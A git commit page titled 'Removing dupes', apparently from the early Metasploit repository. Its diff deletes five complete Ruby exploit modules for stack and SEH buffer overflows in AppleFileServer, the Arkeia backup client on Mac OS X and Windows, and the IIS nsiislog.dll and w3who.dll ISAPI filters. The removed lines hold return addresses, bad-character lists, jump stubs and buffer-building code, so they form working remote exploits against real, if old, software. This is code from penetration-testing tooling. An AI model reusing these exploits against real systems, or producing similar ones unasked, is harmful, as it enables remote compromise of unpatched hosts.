Removing dupes
git-svn-id: file:///home/svn/incoming/trunk@3255 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
97129d0303
commit
53a49f55d4
|
@ -1,88 +0,0 @@
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
class Exploits::Osx::Afp::AFPLoginExt < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
include Exploit::Remote::Tcp
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'AppleFileServer LoginExt PathName Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a stack overflow in the AppleFileServer service
|
|
||||||
on MacOS X. This vulnerability was originally reported by Atstake and
|
|
||||||
was actually one of the few useful advisories ever published by that
|
|
||||||
company. You only have one chance to exploit this bug.
|
|
||||||
This particular exploit uses a stack-based return address that will
|
|
||||||
only work under optimal conditions.
|
|
||||||
},
|
|
||||||
'Author' => 'hdm',
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'OSVDB', '5762' ],
|
|
||||||
[ 'MIL', '2' ],
|
|
||||||
],
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 512,
|
|
||||||
'BadChars' => "\x00\x20",
|
|
||||||
'MinNops' => 128,
|
|
||||||
'Compat' =>
|
|
||||||
{
|
|
||||||
'ConnectionType' => "+find"
|
|
||||||
}
|
|
||||||
},
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
# Target 0
|
|
||||||
[
|
|
||||||
'Mac OS X 10.3.3',
|
|
||||||
{
|
|
||||||
'Platform' => 'osx',
|
|
||||||
'Arch' => ARCH_PPC,
|
|
||||||
'Ret' => 0xf0101c0c # stack address :<
|
|
||||||
},
|
|
||||||
],
|
|
||||||
],
|
|
||||||
'DisclosureDate' => 'May 3 2004'))
|
|
||||||
|
|
||||||
# Configure the default port to be AFP
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
Opt::RPORT(548),
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
connect
|
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
|
||||||
|
|
||||||
path = "\xff" * 1024
|
|
||||||
path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret)
|
|
||||||
path[172, payload.encoded.length] = payload.encoded
|
|
||||||
|
|
||||||
# The AFP header
|
|
||||||
afp = "\x3f\x00\x00\x00"
|
|
||||||
|
|
||||||
# Add the authentication methods
|
|
||||||
["AFP3.1", "Cleartxt Passwrd"].each { |m|
|
|
||||||
afp << [m.length].pack('C') + m
|
|
||||||
}
|
|
||||||
|
|
||||||
# Add the user type and afp path
|
|
||||||
afp << "\x03" + [9].pack('n') + Rex::Text.rand_text_alphanumeric(9)
|
|
||||||
afp << "\x03" + [path.length].pack('n') + path
|
|
||||||
|
|
||||||
sock.write(afp)
|
|
||||||
|
|
||||||
handler
|
|
||||||
|
|
||||||
disconnect
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -1,105 +0,0 @@
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
class Exploits::Osx::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
include Exploit::Remote::Arkeia
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a stack overflow in the Arkeia backup
|
|
||||||
client for the Mac OS X platform. This vulnerability affects
|
|
||||||
all versions up to and including 5.3.3 and has been tested
|
|
||||||
with Arkeia 5.3.1 on Mac OS X 10.3.5.
|
|
||||||
|
|
||||||
},
|
|
||||||
'Author' => [ 'hdm' ],
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'OSVDB', '14011'],
|
|
||||||
[ 'BID', '12594'],
|
|
||||||
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
|
|
||||||
[ 'MIL', '6'],
|
|
||||||
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 1000,
|
|
||||||
'BadChars' => "\x00",
|
|
||||||
'MinNops' => 700,
|
|
||||||
},
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
[
|
|
||||||
'Arkeia 5.3.1 Stack Return (boot)',
|
|
||||||
{
|
|
||||||
'Platform' => 'osx',
|
|
||||||
'Arch' => ARCH_PPC,
|
|
||||||
'Ret' => 0xbffff910,
|
|
||||||
},
|
|
||||||
],
|
|
||||||
],
|
|
||||||
'DisclosureDate' => 'Feb 18 2005',
|
|
||||||
'DefaultTarget' => 0))
|
|
||||||
end
|
|
||||||
|
|
||||||
def check
|
|
||||||
info = arkeia_info()
|
|
||||||
if(not (info and info['Version']))
|
|
||||||
return Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Arkeia Server Information:")
|
|
||||||
info.each_pair { |k,v|
|
|
||||||
print_status(" #{k + (" " * (30-k.length))} = #{v}")
|
|
||||||
}
|
|
||||||
|
|
||||||
if (info['System'] !~ /Darwin/)
|
|
||||||
print_status("This module only supports Mac OS X targets")
|
|
||||||
return Exploit::CheckCode::Detected
|
|
||||||
end
|
|
||||||
|
|
||||||
if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
|
|
||||||
return Exploit::CheckCode::Vulnerable
|
|
||||||
end
|
|
||||||
|
|
||||||
return Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
connect
|
|
||||||
|
|
||||||
# Request has to be big enough to find and small enough
|
|
||||||
# not to write off the end of the stack. If we write too
|
|
||||||
# far down, we also smash env[], which causes a crash in
|
|
||||||
# getenv() before our function returns.
|
|
||||||
|
|
||||||
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
|
|
||||||
buf = Rex::Text.rand_text_english(1200, payload_badchars)
|
|
||||||
|
|
||||||
# Return back to the stack either directly or via system lib
|
|
||||||
buf[0, 112] = [target.ret].pack('N') * (112/4)
|
|
||||||
|
|
||||||
# Huge nop slep followed by the payload
|
|
||||||
buf[112, payload.encoded.length] = payload.encoded
|
|
||||||
|
|
||||||
head[6, 2] = [buf.length].pack('n')
|
|
||||||
|
|
||||||
begin
|
|
||||||
sock.put(head)
|
|
||||||
sock.put(buf)
|
|
||||||
sock.get_once
|
|
||||||
rescue IOError, EOFError => e
|
|
||||||
print_status("Exception: #{e.class}:#{e.to_s}")
|
|
||||||
end
|
|
||||||
handler
|
|
||||||
disconnect
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,117 +0,0 @@
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
include Exploit::Remote::Arkeia
|
|
||||||
include Exploit::Remote::Seh
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a stack overflow in the Arkeia backup
|
|
||||||
client for the Windows platform. This vulnerability affects
|
|
||||||
all versions up to and including 5.3.3.
|
|
||||||
|
|
||||||
},
|
|
||||||
'Author' => [ 'hdm' ],
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'OSVDB', '14011'],
|
|
||||||
[ 'BID', '12594'],
|
|
||||||
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
|
|
||||||
[ 'MIL', '7'],
|
|
||||||
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
'DefaultOptions' =>
|
|
||||||
{
|
|
||||||
'EXITFUNC' => 'process',
|
|
||||||
},
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 1000,
|
|
||||||
'BadChars' => "\x00",
|
|
||||||
'StackAdjustment' => -3500,
|
|
||||||
},
|
|
||||||
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
['Arkeia 5.3.3 and 5.2.27 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x004130a2, 5 ] }], # arkeiad.exe
|
|
||||||
['Arkeia 5.2.27 and 5.1.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00407b9c, 5 ] }], # arkeiad.exe
|
|
||||||
['Arkeia 5.3.3 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x0041d6b9, 5 ] }], # arkeiad.exe
|
|
||||||
['Arkeia 5.1.19 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00423264, 5 ] }], # arkeiad.exe
|
|
||||||
['Arkeia 5.x Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 5 ] }], # ws2help.dll
|
|
||||||
['Arkeia 5.x Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 5 ] }], # ws2help.dll
|
|
||||||
['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 5 ] }], # ws2help.dll
|
|
||||||
['Arkeia 4.2 Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 4 ] }], # ws2help.dll
|
|
||||||
['Arkeia 4.2 Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 4 ] }], # ws2help.dll
|
|
||||||
['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 4 ] }], # ws2help.dll
|
|
||||||
['Arkeia 4.2 Windows 2000 German', { 'Platform' => 'win', 'Rets' => [ 0x74fa1887, 4 ] }], # ws2help.dll
|
|
||||||
],
|
|
||||||
'DisclosureDate' => 'Feb 18 2005',
|
|
||||||
'DefaultTarget' => 0))
|
|
||||||
end
|
|
||||||
|
|
||||||
def check
|
|
||||||
info = arkeia_info()
|
|
||||||
if(not (info and info['Version']))
|
|
||||||
return Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Arkeia Server Information:")
|
|
||||||
info.each_pair { |k,v|
|
|
||||||
print_status(" #{k + (" " * (30-k.length))} = #{v}")
|
|
||||||
}
|
|
||||||
|
|
||||||
if (info['System'] !~ /Windows/)
|
|
||||||
print_status("This module only supports Windows targets")
|
|
||||||
return Exploit::CheckCode::Detected
|
|
||||||
end
|
|
||||||
|
|
||||||
if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
|
|
||||||
return Exploit::CheckCode::Vulnerable
|
|
||||||
end
|
|
||||||
|
|
||||||
return Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
connect
|
|
||||||
|
|
||||||
print_status("Trying target #{target.name}...")
|
|
||||||
|
|
||||||
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
|
|
||||||
data = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()
|
|
||||||
head[6, 2] = [data.length].pack('n')
|
|
||||||
|
|
||||||
begin
|
|
||||||
sock.put(head)
|
|
||||||
sock.put(data)
|
|
||||||
sock.get_once
|
|
||||||
rescue IOError, EOFError => e
|
|
||||||
print_status("Exception: #{e.class}:#{e.to_s}")
|
|
||||||
end
|
|
||||||
handler
|
|
||||||
disconnect
|
|
||||||
end
|
|
||||||
|
|
||||||
def prep_ark5
|
|
||||||
data = Rex::Text.rand_text_english(4096, payload_badchars)
|
|
||||||
data[1176, 4] = [target['Rets'][0]].pack('V')
|
|
||||||
data[1172, 2] = "\xeb\xf9"
|
|
||||||
data[1167, 5] = "\xe98" + [-1172].pack('V')
|
|
||||||
data[0, payload.encoded.length] = payload.encoded
|
|
||||||
end
|
|
||||||
|
|
||||||
def prep_ark4
|
|
||||||
data = Rex::Text.rand_text_english(4096, payload_badchars)
|
|
||||||
seh = generate_seh_payload( target['Rets'][0] )
|
|
||||||
data[ 96, seh.length] = seh
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,101 +0,0 @@
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
|
|
||||||
include Exploit::Remote::HttpClient
|
|
||||||
include Exploit::Remote::BruteTargets
|
|
||||||
include Exploit::Remote::Seh
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'IIS nsiislog.dll ISAPI POST Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
This exploits a buffer overflow found in the nsiislog.dll
|
|
||||||
ISAPI filter that comes with Windows Media Server. This
|
|
||||||
module will also work against the 'patched' MS03-019
|
|
||||||
version. This vulnerability was addressed by MS03-022.
|
|
||||||
|
|
||||||
},
|
|
||||||
'Author' => [ 'hdm' ],
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'OSVDB', '4535'],
|
|
||||||
[ 'MSB', 'MS03-022'],
|
|
||||||
[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
|
|
||||||
[ 'MIL', '30'],
|
|
||||||
|
|
||||||
],
|
|
||||||
'Privileged' => false,
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 1024,
|
|
||||||
'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
|
|
||||||
|
|
||||||
},
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
['Brute Force', { }],
|
|
||||||
['Windows 2000 -MS03-019', { 'Rets' => [ 9769, 0x40f01333 ] }],
|
|
||||||
['Windows 2000 +MS03-019', { 'Rets' => [ 13869, 0x40f01353 ] }],
|
|
||||||
['Windows XP -MS03-019', { 'Rets' => [ 9773, 0x40f011e0 ] }],
|
|
||||||
],
|
|
||||||
'DisclosureDate' => 'Jun 25 2003',
|
|
||||||
'DefaultTarget' => 0))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('URL', [ true, "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
|
|
||||||
], self)
|
|
||||||
end
|
|
||||||
|
|
||||||
def check
|
|
||||||
c = connect
|
|
||||||
req = c.request({ 'uri' => datastore['URL'] })
|
|
||||||
res = c.send_request(req, -1)
|
|
||||||
|
|
||||||
if (res and res.body =~ /NetShow ISAPI/)
|
|
||||||
return Exploit::CheckCode::Detected
|
|
||||||
end
|
|
||||||
return Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit_target(target)
|
|
||||||
|
|
||||||
c = connect
|
|
||||||
|
|
||||||
buf = ''
|
|
||||||
%w{
|
|
||||||
date time c-dns cs-uri-stem c-starttime
|
|
||||||
x-duration c-rate c-status c-playerid c-playerversion
|
|
||||||
c-playerlanguage cs(User-Agent) cs(Referer) c-hostexe
|
|
||||||
}.each do |field|
|
|
||||||
buf << field + '=' + 'BOOM&'
|
|
||||||
end
|
|
||||||
|
|
||||||
pat = 'O' * 65535
|
|
||||||
seh = generate_seh_payload(target['Rets'][1])
|
|
||||||
pat[ target['Rets'][0] - 4, seh.length] = seh
|
|
||||||
buf << pat
|
|
||||||
|
|
||||||
req = c.request({
|
|
||||||
'uri' => datastore['URL'],
|
|
||||||
'method' => 'POST',
|
|
||||||
'user-agent' => 'NSPlayer/2.0',
|
|
||||||
'content-type' => 'application/x-www-form-urlencoded',
|
|
||||||
'data' => buf,
|
|
||||||
})
|
|
||||||
|
|
||||||
print_status("Sending request...")
|
|
||||||
c.send_request(req, 0)
|
|
||||||
|
|
||||||
handler
|
|
||||||
disconnect
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,89 +0,0 @@
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
include Exploit::Remote::HttpClient
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'IIS w3who.dll ISAPI Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a stack overflow in the w3who.dll ISAPI
|
|
||||||
application. This vulnerability was discovered Nicolas
|
|
||||||
Gregoire and this code has been successfully tested against
|
|
||||||
Windows 2000 and Windows XP (SP2). When exploiting Windows
|
|
||||||
XP, the payload must call RevertToSelf before it will be
|
|
||||||
able to spawn a command shell.
|
|
||||||
|
|
||||||
},
|
|
||||||
'Author' => [ 'hdm' ],
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'OSVDB', '12258'],
|
|
||||||
[ 'CVE', '2004-1134'],
|
|
||||||
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
|
|
||||||
[ 'MIL', '32'],
|
|
||||||
[ 'BID', '11820'],
|
|
||||||
|
|
||||||
],
|
|
||||||
'Privileged' => false,
|
|
||||||
'DefaultOptions' =>
|
|
||||||
{
|
|
||||||
'EXITFUNC' => 'process',
|
|
||||||
},
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 632,
|
|
||||||
'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
|
|
||||||
'MinNops' => 128,
|
|
||||||
|
|
||||||
},
|
|
||||||
'Platform' => 'win',
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
|
|
||||||
['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
|
|
||||||
],
|
|
||||||
'DisclosureDate' => 'Dec 6 2004'))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
|
|
||||||
], self)
|
|
||||||
end
|
|
||||||
|
|
||||||
def check
|
|
||||||
c = connect
|
|
||||||
req = c.request({ 'uri' => datastore['URL'] })
|
|
||||||
res = c.send_request(req, -1)
|
|
||||||
|
|
||||||
if (res and res.body =~ /Access Token/)
|
|
||||||
return Exploit::CheckCode::Vulnerable
|
|
||||||
end
|
|
||||||
return Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
c = connect
|
|
||||||
|
|
||||||
buf = Rex::Text.rand_text_english(8192, payload_badchars)
|
|
||||||
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
|
|
||||||
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
|
|
||||||
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
|
|
||||||
buf[target['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
|
||||||
|
|
||||||
url = datastore['URL'] + '?' + buf
|
|
||||||
req = c.request({ 'uri' => url })
|
|
||||||
|
|
||||||
print_status("Sending request...")
|
|
||||||
c.send_request(req, 0)
|
|
||||||
|
|
||||||
handler
|
|
||||||
disconnect
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
Loading…
Reference in New Issue